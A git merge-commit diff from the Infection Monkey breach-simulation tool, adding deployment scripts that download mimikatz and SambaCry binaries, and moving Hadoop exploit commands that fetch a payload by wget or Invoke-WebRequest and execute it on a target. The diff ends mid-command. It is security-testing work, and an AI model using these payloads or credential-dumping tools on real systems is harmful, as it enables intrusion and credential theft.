Merge branch 'develop' into feature/report_exporters
# Conflicts: # monkey/common/cloud/aws.py # monkey/monkey_island/cc/services/config.py
This commit is contained in:
commit
6b35f22280
|
@ -44,7 +44,8 @@ Check out the [Setup](https://github.com/guardicore/monkey/wiki/setup) page in t
|
|||
|
||||
Building the Monkey from source
|
||||
-------------------------------
|
||||
If you want to build the monkey from source, see [Setup](https://github.com/guardicore/monkey/wiki/Setup#compile-it-yourself)
|
||||
To deploy development version of monkey you should refer to readme in the [deployment scripts](deployment_scripts) folder.
|
||||
If you only want to build the monkey from source, see [Setup](https://github.com/guardicore/monkey/wiki/Setup#compile-it-yourself)
|
||||
and follow the instructions at the readme files under [infection_monkey](infection_monkey) and [monkey_island](monkey_island).
|
||||
|
||||
|
||||
|
|
|
@ -0,0 +1,23 @@
|
|||
# Files used to deploy development version of infection monkey
|
||||
## Windows
|
||||
|
||||
Before running the script you must have git installed.<br>
|
||||
Cd to scripts directory and use the scripts.<br>
|
||||
First argument is an empty directory (script can create one) and second is branch you want to clone.
|
||||
Example usages:<br>
|
||||
./run_script.bat (Sets up monkey in current directory under .\infection_monkey)<br>
|
||||
./run_script.bat "C:\test" (Sets up monkey in C:\test)<br>
|
||||
powershell -ExecutionPolicy ByPass -Command ". .\deploy_windows.ps1; Deploy-Windows -monkey_home C:\test" (Same as above)<br>
|
||||
./run_script.bat "" "master"(Sets up master branch instead of develop in current dir)
|
||||
Don't forget to add python to PATH or do so while installing it via this script.<br>
|
||||
|
||||
## Linux
|
||||
|
||||
You must have root permissions, but there is no need to run the script as root.<br>
|
||||
Launch deploy_linux.sh from scripts directory.<br>
|
||||
First argument is an empty directory (script can create one) and second is branch you want to clone.
|
||||
Example usages:<br>
|
||||
./deploy_linux.sh (deploys under ./infection_monkey)<br>
|
||||
./deploy_linux.sh "/home/test/monkey" (deploys under /home/test/monkey)<br>
|
||||
./deploy_linux.sh "" "master" (deploys master branch in script directory)<br>
|
||||
./deploy_linux.sh "/home/user/new" "master" (if directory "new" is not found creates it and clones master branch into it)<br>
|
|
@ -0,0 +1,19 @@
|
|||
#!/usr/bin/env bash
|
||||
# Absolute monkey's path
|
||||
MONKEY_FOLDER_NAME="infection_monkey"
|
||||
# Url of public git repository that contains monkey's source code
|
||||
MONKEY_GIT_URL="https://github.com/guardicore/monkey"
|
||||
|
||||
# Monkey binaries
|
||||
LINUX_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-32"
|
||||
LINUX_32_BINARY_NAME="monkey-linux-32"
|
||||
LINUX_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-64"
|
||||
LINUX_64_BINARY_NAME="monkey-linux-64"
|
||||
WINDOWS_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-32.exe"
|
||||
WINDOWS_32_BINARY_NAME="monkey-windows-32.exe"
|
||||
WINDOWS_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-64.exe"
|
||||
WINDOWS_64_BINARY_NAME="monkey-windows-64.exe"
|
||||
|
||||
# Mongo url's
|
||||
MONGO_DEBIAN_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-debian81-latest.tgz"
|
||||
MONGO_UBUNTU_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1604-latest.tgz"
|
|
@ -0,0 +1,48 @@
|
|||
# Absolute monkey's path
|
||||
$MONKEY_FOLDER_NAME = "infection_monkey"
|
||||
# Url of public git repository that contains monkey's source code
|
||||
$MONKEY_GIT_URL = "https://github.com/guardicore/monkey"
|
||||
# Link to the latest python download or install it manually
|
||||
$PYTHON_URL = "https://www.python.org/ftp/python/2.7.13/python-2.7.13.amd64.msi"
|
||||
|
||||
# Monkey binaries
|
||||
$LINUX_32_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-32"
|
||||
$LINUX_32_BINARY_PATH = "monkey-linux-32"
|
||||
$LINUX_64_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-64"
|
||||
$LINUX_64_BINARY_PATH = "monkey-linux-64"
|
||||
$WINDOWS_32_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-32.exe"
|
||||
$WINDOWS_32_BINARY_PATH = "monkey-windows-32.exe"
|
||||
$WINDOWS_64_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-64.exe"
|
||||
$WINDOWS_64_BINARY_PATH = "monkey-windows-64.exe"
|
||||
$SAMBA_32_BINARY_URL = "https://github.com/VakarisZ/tempBinaries/raw/master/sc_monkey_runner32.so"
|
||||
$SAMBA_32_BINARY_NAME= "sc_monkey_runner32.so"
|
||||
$SAMBA_64_BINARY_URL = "https://github.com/VakarisZ/tempBinaries/raw/master/sc_monkey_runner64.so"
|
||||
$SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so"
|
||||
|
||||
# Other directories and paths ( most likely you dont need to configure)
|
||||
$MONKEY_ISLAND_DIR = "\monkey\monkey_island"
|
||||
$MONKEY_DIR = "\monkey\infection_monkey"
|
||||
$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\monkey_utils\sambacry_monkey_runner"
|
||||
$PYTHON_DLL = "C:\Windows\System32\python27.dll"
|
||||
$MK32_DLL = "mk32.dll"
|
||||
$MK64_DLL = "mk64.dll"
|
||||
$TEMP_PYTHON_INSTALLER = ".\python.msi"
|
||||
$TEMP_MONGODB_ZIP = ".\mongodb.zip"
|
||||
$TEMP_OPEN_SSL_ZIP = ".\openssl.zip"
|
||||
$TEMP_CPP_INSTALLER = "cpp.exe"
|
||||
$TEMP_NPM_INSTALLER = "node.msi"
|
||||
$TEMP_PYWIN32_INSTALLER = "pywin32.exe"
|
||||
$TEMP_UPX_ZIP = "upx.zip"
|
||||
$TEMP_VC_FOR_PYTHON27_INSTALLER = "vcforpython.msi"
|
||||
$UPX_FOLDER = "upx394w"
|
||||
|
||||
# Other url's
|
||||
$VC_FOR_PYTHON27_URL = "https://download.microsoft.com/download/7/9/6/796EF2E4-801B-4FC4-AB28-B59FBF6D907B/VCForPython27.msi"
|
||||
$MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip"
|
||||
$OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip"
|
||||
$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572"
|
||||
$NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi"
|
||||
$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe"
|
||||
$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip"
|
||||
$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.dll"
|
||||
$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.dll"
|
|
@ -0,0 +1,157 @@
|
|||
#!/bin/bash
|
||||
source config
|
||||
|
||||
# Setup monkey either in dir required or current dir
|
||||
monkey_home=${1:-`pwd`}
|
||||
if [[ $monkey_home == `pwd` ]]; then
|
||||
monkey_home="$monkey_home/$MONKEY_FOLDER_NAME"
|
||||
fi
|
||||
|
||||
# We can set main paths after we know the home dir
|
||||
ISLAND_PATH="$monkey_home/monkey/monkey_island"
|
||||
MONKEY_COMMON_PATH="$monkey_home/monkey/common/"
|
||||
MONGO_PATH="$ISLAND_PATH/bin/mongodb"
|
||||
MONGO_BIN_PATH="$MONGO_PATH/bin"
|
||||
ISLAND_DB_PATH="$ISLAND_PATH/db"
|
||||
ISLAND_BINARIES_PATH="$ISLAND_PATH/cc/binaries"
|
||||
|
||||
handle_error () {
|
||||
echo "Fix the errors above and rerun the script"
|
||||
exit 1
|
||||
}
|
||||
|
||||
log_message () {
|
||||
echo -e "\n\n-------------------------------------------"
|
||||
echo -e "DEPLOYMENT SCRIPT: $1"
|
||||
echo -e "-------------------------------------------\n"
|
||||
}
|
||||
|
||||
sudo -v
|
||||
if [[ $? != 0 ]]; then
|
||||
echo "You need root permissions for some of this script operations. Quiting."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if [[ ! -d ${monkey_home} ]]; then
|
||||
mkdir -p ${monkey_home}
|
||||
fi
|
||||
|
||||
git --version &>/dev/null
|
||||
git_available=$?
|
||||
if [[ ${git_available} != 0 ]]; then
|
||||
echo "Please install git and re-run this script"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
log_message "Cloning files from git"
|
||||
branch=${2:-"develop"}
|
||||
if [[ ! -d "$monkey_home/monkey" ]]; then # If not already cloned
|
||||
git clone --single-branch -b $branch ${MONKEY_GIT_URL} ${monkey_home} 2>&1 || handle_error
|
||||
chmod 774 -R ${monkey_home}
|
||||
fi
|
||||
|
||||
# Create folders
|
||||
log_message "Creating island dirs under $ISLAND_PATH"
|
||||
mkdir -p ${MONGO_BIN_PATH}
|
||||
mkdir -p ${ISLAND_DB_PATH}
|
||||
mkdir -p ${ISLAND_BINARIES_PATH} || handle_error
|
||||
|
||||
python_version=`python --version 2>&1`
|
||||
if [[ ${python_version} == *"command not found"* ]] || [[ ${python_version} != *"Python 2.7"* ]]; then
|
||||
echo "Python 2.7 is not found or is not a default interpreter for 'python' command..."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
log_message "Updating package list"
|
||||
sudo apt-get update
|
||||
|
||||
log_message "Installing pip"
|
||||
sudo apt-get install python-pip
|
||||
|
||||
log_message "Installing island requirements"
|
||||
requirements="$ISLAND_PATH/requirements.txt"
|
||||
python -m pip install --user -r ${requirements} || handle_error
|
||||
|
||||
# Download binaries
|
||||
log_message "Downloading binaries"
|
||||
wget -c -N -P ${ISLAND_BINARIES_PATH} ${LINUX_32_BINARY_URL}
|
||||
wget -c -N -P ${ISLAND_BINARIES_PATH} ${LINUX_64_BINARY_URL}
|
||||
wget -c -N -P ${ISLAND_BINARIES_PATH} ${WINDOWS_32_BINARY_URL}
|
||||
wget -c -N -P ${ISLAND_BINARIES_PATH} ${WINDOWS_64_BINARY_URL}
|
||||
# Allow them to be executed
|
||||
chmod a+x "$ISLAND_BINARIES_PATH/$LINUX_32_BINARY_NAME"
|
||||
chmod a+x "$ISLAND_BINARIES_PATH/$LINUX_64_BINARY_NAME"
|
||||
chmod a+x "$ISLAND_BINARIES_PATH/$WINDOWS_32_BINARY_NAME"
|
||||
chmod a+x "$ISLAND_BINARIES_PATH/$WINDOWS_64_BINARY_NAME"
|
||||
|
||||
# Get machine type/kernel version
|
||||
kernel=`uname -m`
|
||||
linux_dist=`lsb_release -a 2> /dev/null`
|
||||
|
||||
# If a user haven't installed mongo manually check if we can install it with our script
|
||||
if [[ ! -f "$MONGO_BIN_PATH/mongod" ]] && { [[ ${kernel} != "x86_64" ]] || \
|
||||
{ [[ ${linux_dist} != *"Debian"* ]] && [[ ${linux_dist} != *"Ubuntu"* ]]; }; }; then
|
||||
echo "Script does not support your operating system for mongodb installation.
|
||||
Reference monkey island readme and install it manually"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Download mongo
|
||||
if [[ ! -f "$MONGO_BIN_PATH/mongod" ]]; then
|
||||
log_message "Downloading mongodb"
|
||||
if [[ ${linux_dist} == *"Debian"* ]]; then
|
||||
wget -c -N -O "/tmp/mongo.tgz" ${MONGO_DEBIAN_URL}
|
||||
elif [[ ${linux_dist} == *"Ubuntu"* ]]; then
|
||||
wget -c -N -O "/tmp/mongo.tgz" ${MONGO_UBUNTU_URL}
|
||||
fi
|
||||
tar --strip 2 --wildcards -C ${MONGO_BIN_PATH} -zxvf /tmp/mongo.tgz mongo*/bin/* || handle_error
|
||||
else
|
||||
log_message "Mongo db already installed"
|
||||
fi
|
||||
|
||||
log_message "Installing openssl"
|
||||
sudo apt-get install openssl
|
||||
|
||||
# Generate SSL certificate
|
||||
log_message "Generating certificate"
|
||||
cd ${ISLAND_PATH} || handle_error
|
||||
openssl genrsa -out cc/server.key 1024 || handle_error
|
||||
openssl req -new -key cc/server.key -out cc/server.csr \
|
||||
-subj "/C=GB/ST=London/L=London/O=Global Security/OU=Monkey Department/CN=monkey.com" || handle_error
|
||||
openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt || handle_error
|
||||
|
||||
|
||||
chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error
|
||||
${ISLAND_PATH}/linux/create_certificate.sh || handle_error
|
||||
|
||||
# Install npm
|
||||
log_message "Installing npm"
|
||||
sudo apt-get install npm
|
||||
|
||||
# Update node
|
||||
log_message "Updating node"
|
||||
curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash -
|
||||
sudo apt-get install -y nodejs
|
||||
|
||||
log_message "Generating front end"
|
||||
cd "$ISLAND_PATH/cc/ui" || handle_error
|
||||
npm update
|
||||
npm run dist
|
||||
|
||||
# Monkey setup
|
||||
log_message "Installing monkey requirements"
|
||||
sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1
|
||||
cd ${monkey_home}/monkey/infection_monkey || handle_error
|
||||
python -m pip install --user -r requirements.txt || handle_error
|
||||
|
||||
# Build samba
|
||||
log_message "Building samba binaries"
|
||||
sudo apt-get install gcc-multilib
|
||||
cd ${monkey_home}/monkey/infection_monkey/monkey_utils/sambacry_monkey_runner
|
||||
chmod +x ./build.sh || handle_error
|
||||
./build.sh
|
||||
|
||||
chmod +x ${monkey_home}/monkey/infection_monkey/build_linux.sh
|
||||
|
||||
log_message "Deployment script finished."
|
||||
exit 0
|
|
@ -0,0 +1,215 @@
|
|||
function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, [String] $branch = "develop"){
|
||||
# Import the config variables
|
||||
. ./config.ps1
|
||||
"Config variables from config.ps1 imported"
|
||||
|
||||
# If we want monkey in current dir we need to create an empty folder for source files
|
||||
if ( (Join-Path $monkey_home '') -eq (Join-Path (Get-Item -Path ".\").FullName '') ){
|
||||
$monkey_home = Join-Path -Path $monkey_home -ChildPath $MONKEY_FOLDER_NAME
|
||||
}
|
||||
|
||||
# Set variables for script execution
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
$webClient = New-Object System.Net.WebClient
|
||||
|
||||
# We check if git is installed
|
||||
try
|
||||
{
|
||||
git | Out-Null -ErrorAction Stop
|
||||
"Git requirement satisfied"
|
||||
}
|
||||
catch [System.Management.Automation.CommandNotFoundException]
|
||||
{
|
||||
"Please install git before running this script or add it to path and restart cmd"
|
||||
return
|
||||
}
|
||||
|
||||
# Download the monkey
|
||||
$output = cmd.exe /c "git clone --single-branch -b $branch $MONKEY_GIT_URL $monkey_home 2>&1"
|
||||
$binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\bin")
|
||||
if ( $output -like "*already exists and is not an empty directory.*"){
|
||||
"Assuming you already have the source directory. If not, make sure to set an empty directory as monkey's home directory."
|
||||
} elseif ($output -like "fatal:*"){
|
||||
"Error while cloning monkey from the repository:"
|
||||
$output
|
||||
return
|
||||
} else {
|
||||
"Monkey cloned from the repository"
|
||||
# Create bin directory
|
||||
New-Item -ItemType directory -path $binDir
|
||||
"Bin directory added"
|
||||
}
|
||||
|
||||
# We check if python is installed
|
||||
try
|
||||
{
|
||||
$version = cmd.exe /c '"python" --version 2>&1'
|
||||
if ( $version -like 'Python 2.7.*' ) {
|
||||
"Python 2.7.* was found, installing dependancies"
|
||||
} else {
|
||||
throw System.Management.Automation.CommandNotFoundException
|
||||
}
|
||||
}
|
||||
catch [System.Management.Automation.CommandNotFoundException]
|
||||
{
|
||||
"Downloading python 2.7 ..."
|
||||
$webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER)
|
||||
Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop
|
||||
$env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
|
||||
Remove-Item $TEMP_PYTHON_INSTALLER
|
||||
# Check if installed correctly
|
||||
$version = cmd.exe /c '"python" --version 2>&1'
|
||||
if ( $version -like '* is not recognized*' ) {
|
||||
"Python is not found in PATH. Add it manually or reinstall python."
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
# Set python home dir
|
||||
$PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source)
|
||||
|
||||
# Get vcforpython27 before installing requirements
|
||||
"Downloading Visual C++ Compiler for Python 2.7 ..."
|
||||
$webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER)
|
||||
Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop
|
||||
$env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
|
||||
Remove-Item $TEMP_VC_FOR_PYTHON27_INSTALLER
|
||||
|
||||
# Install requirements for island
|
||||
$islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop
|
||||
"Upgrading pip..."
|
||||
$output = cmd.exe /c 'python -m pip install --user --upgrade pip 2>&1'
|
||||
$output
|
||||
if ( $output -like '*No module named pip*' ) {
|
||||
"Make sure pip module is installed and re-run this script."
|
||||
return
|
||||
}
|
||||
& python -m pip install --user -r $islandRequirements
|
||||
# Install requirements for monkey
|
||||
$monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements.txt"
|
||||
& python -m pip install --user -r $monkeyRequirements
|
||||
|
||||
# Download mongodb
|
||||
if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "mongodb") )){
|
||||
"Downloading mongodb ..."
|
||||
$webClient.DownloadFile($MONGODB_URL, $TEMP_MONGODB_ZIP)
|
||||
"Unzipping mongodb"
|
||||
Expand-Archive $TEMP_MONGODB_ZIP -DestinationPath $binDir
|
||||
# Get unzipped folder's name
|
||||
$mongodb_folder = Get-ChildItem -Path $binDir | Where-Object -FilterScript {($_.Name -like "mongodb*")} | Select-Object -ExpandProperty Name
|
||||
# Move all files from extracted folder to mongodb folder
|
||||
New-Item -ItemType directory -Path (Join-Path -Path $binDir -ChildPath "mongodb")
|
||||
New-Item -ItemType directory -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "db")
|
||||
"Moving extracted files"
|
||||
Move-Item -Path (Join-Path -Path $binDir -ChildPath $mongodb_folder | Join-Path -ChildPath "\bin\*") -Destination (Join-Path -Path $binDir -ChildPath "mongodb\")
|
||||
"Removing zip file"
|
||||
Remove-Item $TEMP_MONGODB_ZIP
|
||||
Remove-Item (Join-Path -Path $binDir -ChildPath $mongodb_folder) -Recurse
|
||||
}
|
||||
|
||||
# Download OpenSSL
|
||||
"Downloading OpenSSL ..."
|
||||
$webClient.DownloadFile($OPEN_SSL_URL, $TEMP_OPEN_SSL_ZIP)
|
||||
"Unzipping OpenSSl"
|
||||
Expand-Archive $TEMP_OPEN_SSL_ZIP -DestinationPath (Join-Path -Path $binDir -ChildPath "openssl") -ErrorAction SilentlyContinue
|
||||
"Removing zip file"
|
||||
Remove-Item $TEMP_OPEN_SSL_ZIP
|
||||
|
||||
# Download and install C++ redistributable
|
||||
"Downloading C++ redistributable ..."
|
||||
$webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER)
|
||||
Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop
|
||||
Remove-Item $TEMP_CPP_INSTALLER
|
||||
|
||||
# Generate ssl certificate
|
||||
"Generating ssl certificate"
|
||||
Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR)
|
||||
. .\windows\create_certificate.bat
|
||||
Pop-Location
|
||||
|
||||
# Adding binaries
|
||||
"Adding binaries"
|
||||
$binaries = (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\cc\binaries")
|
||||
New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue
|
||||
$webClient.DownloadFile($LINUX_32_BINARY_URL, (Join-Path -Path $binaries -ChildPath $LINUX_32_BINARY_PATH))
|
||||
$webClient.DownloadFile($LINUX_64_BINARY_URL, (Join-Path -Path $binaries -ChildPath $LINUX_64_BINARY_PATH))
|
||||
$webClient.DownloadFile($WINDOWS_32_BINARY_URL, (Join-Path -Path $binaries -ChildPath $WINDOWS_32_BINARY_PATH))
|
||||
$webClient.DownloadFile($WINDOWS_64_BINARY_URL, (Join-Path -Path $binaries -ChildPath $WINDOWS_64_BINARY_PATH))
|
||||
|
||||
# Check if NPM installed
|
||||
"Installing npm"
|
||||
try
|
||||
{
|
||||
$version = cmd.exe /c '"npm" --version 2>&1'
|
||||
if ( $version -like "*is not recognized*"){
|
||||
throw System.Management.Automation.CommandNotFoundException
|
||||
} else {
|
||||
"Npm already installed"
|
||||
}
|
||||
}
|
||||
catch [System.Management.Automation.CommandNotFoundException]
|
||||
{
|
||||
"Downloading npm ..."
|
||||
$webClient.DownloadFile($NPM_URL, $TEMP_NPM_INSTALLER)
|
||||
Start-Process -Wait $TEMP_NPM_INSTALLER
|
||||
$env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
|
||||
Remove-Item $TEMP_NPM_INSTALLER
|
||||
}
|
||||
|
||||
"Updating npm"
|
||||
Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\cc\ui")
|
||||
& npm update
|
||||
& npm run dist
|
||||
Pop-Location
|
||||
|
||||
# Install pywin32
|
||||
"Downloading pywin32"
|
||||
$webClient.DownloadFile($PYWIN32_URL, $TEMP_PYWIN32_INSTALLER)
|
||||
Start-Process -Wait $TEMP_PYWIN32_INSTALLER -ErrorAction Stop
|
||||
Remove-Item $TEMP_PYWIN32_INSTALLER
|
||||
|
||||
# Create infection_monkey/bin directory if not already present
|
||||
$binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin")
|
||||
New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue
|
||||
|
||||
# Download upx
|
||||
if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){
|
||||
"Downloading upx ..."
|
||||
$webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP)
|
||||
"Unzipping upx"
|
||||
Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue
|
||||
Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir
|
||||
# Remove unnecessary files
|
||||
Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER)
|
||||
"Removing zip file"
|
||||
Remove-Item $TEMP_UPX_ZIP
|
||||
}
|
||||
|
||||
# Download mimikatz binaries
|
||||
$mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL
|
||||
if(!(Test-Path -Path $mk32_path )){
|
||||
"Downloading mimikatz 32 binary"
|
||||
$webClient.DownloadFile($MK32_DLL_URL, $mk32_path)
|
||||
}
|
||||
$mk64_path = Join-Path -Path $binDir -ChildPath $MK64_DLL
|
||||
if(!(Test-Path -Path $mk64_path )){
|
||||
"Downloading mimikatz 64 binary"
|
||||
$webClient.DownloadFile($MK64_DLL_URL, $mk64_path)
|
||||
}
|
||||
|
||||
# Download sambacry binaries
|
||||
$samba_path = Join-Path -Path $monkey_home -ChildPath $SAMBA_BINARIES_DIR
|
||||
$samba32_path = Join-Path -Path $samba_path -ChildPath $SAMBA_32_BINARY_NAME
|
||||
if(!(Test-Path -Path $samba32_path )){
|
||||
"Downloading sambacry 32 binary"
|
||||
$webClient.DownloadFile($SAMBA_32_BINARY_URL, $samba32_path)
|
||||
}
|
||||
$samba64_path = Join-Path -Path $samba_path -ChildPath $SAMBA_64_BINARY_NAME
|
||||
if(!(Test-Path -Path $samba64_path )){
|
||||
"Downloading sambacry 64 binary"
|
||||
$webClient.DownloadFile($SAMBA_64_BINARY_URL, $samba64_path)
|
||||
}
|
||||
|
||||
"Script finished"
|
||||
|
||||
}
|
|
@ -0,0 +1,8 @@
|
|||
SET command=. .\deploy_windows.ps1; Deploy-Windows
|
||||
if NOT "%~1" == "" (
|
||||
SET "command=%command% -monkey_home %~1"
|
||||
)
|
||||
if NOT "%~2" == "" (
|
||||
SET "command=%command% -branch %~2"
|
||||
)
|
||||
powershell -ExecutionPolicy ByPass -Command %command%
|
|
@ -7,7 +7,7 @@ __author__ = 'itay.mizeretz'
|
|||
class AWS(object):
|
||||
def __init__(self):
|
||||
try:
|
||||
self.instance_id = urllib2.urlopen('http://169.254.169.254/latest/meta-data/instance-id').read()
|
||||
self.instance_id = urllib2.urlopen('http://169.254.169.254/latest/meta-data/instance-id', timeout=2).read()
|
||||
self.region = self._parse_region(urllib2.urlopen('http://169.254.169.254/latest/meta-data/placement/availability-zone').read())
|
||||
except urllib2.URLError:
|
||||
self.instance_id = None
|
||||
|
|
|
@ -1,2 +1,2 @@
|
|||
#!/bin/bash
|
||||
pyinstaller --clean monkey-linux.spec
|
||||
pyinstaller -F --log-level=DEBUG --clean monkey.spec
|
||||
|
|
|
@ -16,6 +16,7 @@
|
|||
"alive": true,
|
||||
"collect_system_info": true,
|
||||
"extract_azure_creds": true,
|
||||
"should_use_mimikatz": true,
|
||||
"depth": 2,
|
||||
|
||||
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
|
||||
|
|
|
@ -12,7 +12,7 @@ import posixpath
|
|||
|
||||
from infection_monkey.exploit.web_rce import WebRCE
|
||||
from infection_monkey.exploit.tools import HTTPTools, build_monkey_commandline, get_monkey_depth
|
||||
from infection_monkey.model import MONKEY_ARG, ID_STRING
|
||||
from infection_monkey.model import MONKEY_ARG, ID_STRING, HADOOP_WINDOWS_COMMAND, HADOOP_LINUX_COMMAND
|
||||
|
||||
__author__ = 'VakarisZ'
|
||||
|
||||
|
@ -22,16 +22,6 @@ LOG = logging.getLogger(__name__)
|
|||
class HadoopExploiter(WebRCE):
|
||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||
HADOOP_PORTS = [["8088", False]]
|
||||
|
||||
# We need to prevent from downloading if monkey already exists because hadoop uses multiple threads/nodes
|
||||
# to download monkey at the same time
|
||||
LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \
|
||||
"&& wget -O %(monkey_path)s %(http_path)s " \
|
||||
"; chmod +x %(monkey_path)s " \
|
||||
"&& %(monkey_path)s %(monkey_type)s %(parameters)s"
|
||||
WINDOWS_COMMAND = "cmd /c if NOT exist %(monkey_path)s bitsadmin /transfer" \
|
||||
" Update /download /priority high %(http_path)s %(monkey_path)s " \
|
||||
"& %(monkey_path)s %(monkey_type)s %(parameters)s"
|
||||
# How long we have our http server open for downloads in seconds
|
||||
DOWNLOAD_TIMEOUT = 60
|
||||
# Random string's length that's used for creating unique app name
|
||||
|
@ -46,6 +36,9 @@ class HadoopExploiter(WebRCE):
|
|||
self.add_vulnerable_urls(urls, True)
|
||||
if not self.vulnerable_urls:
|
||||
return False
|
||||
# We presume hadoop works only on 64-bit machines
|
||||
if self.host.os['type'] == 'windows':
|
||||
self.host.os['machine'] = '64'
|
||||
paths = self.get_monkey_paths()
|
||||
if not paths:
|
||||
return False
|
||||
|
@ -79,9 +72,9 @@ class HadoopExploiter(WebRCE):
|
|||
# Build command to execute
|
||||
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
||||
if 'linux' in self.host.os['type']:
|
||||
base_command = self.LINUX_COMMAND
|
||||
base_command = HADOOP_LINUX_COMMAND
|
||||
else:
|
||||
base_command = self.WINDOWS_COMMAND
|
||||
base_command = HADOOP_WINDOWS_COMMAND
|
||||
|
||||
return base_command % {"monkey_path": path, "http_path": http_path,
|
||||
"monkey_type": MONKEY_ARG, "parameters": monkey_cmd}
|
||||
|
|
|
@ -202,8 +202,17 @@ class ShellShockExploiter(HostExploiter):
|
|||
if is_https:
|
||||
attack_path = 'https://'
|
||||
attack_path = attack_path + str(host) + ":" + str(port)
|
||||
reqs = []
|
||||
timeout = False
|
||||
attack_urls = [attack_path + url for url in url_list]
|
||||
reqs = [requests.head(u, verify=False, timeout=TIMEOUT) for u in attack_urls]
|
||||
for u in attack_urls:
|
||||
try:
|
||||
reqs.append(requests.head(u, verify=False, timeout=TIMEOUT))
|
||||
except requests.Timeout:
|
||||
timeout = True
|
||||
break
|
||||
if timeout:
|
||||
LOG.debug("Some connections timed out while sending request to potentially vulnerable urls.")
|
||||
valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
|
||||
urls = [resp.url for resp in valid_resps]
|
||||
|
||||
|
|
|
@ -28,4 +28,14 @@ CHECK_COMMAND = "echo %s" % ID_STRING
|
|||
GET_ARCH_WINDOWS = "wmic os get osarchitecture"
|
||||
GET_ARCH_LINUX = "lscpu"
|
||||
|
||||
# All in one commands (upload, change permissions, run)
|
||||
HADOOP_WINDOWS_COMMAND = "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " \
|
||||
"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \
|
||||
" if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \
|
||||
"{& %(monkey_path)s %(monkey_type)s %(parameters)s } \""
|
||||
HADOOP_LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \
|
||||
"&& wget -O %(monkey_path)s %(http_path)s " \
|
||||
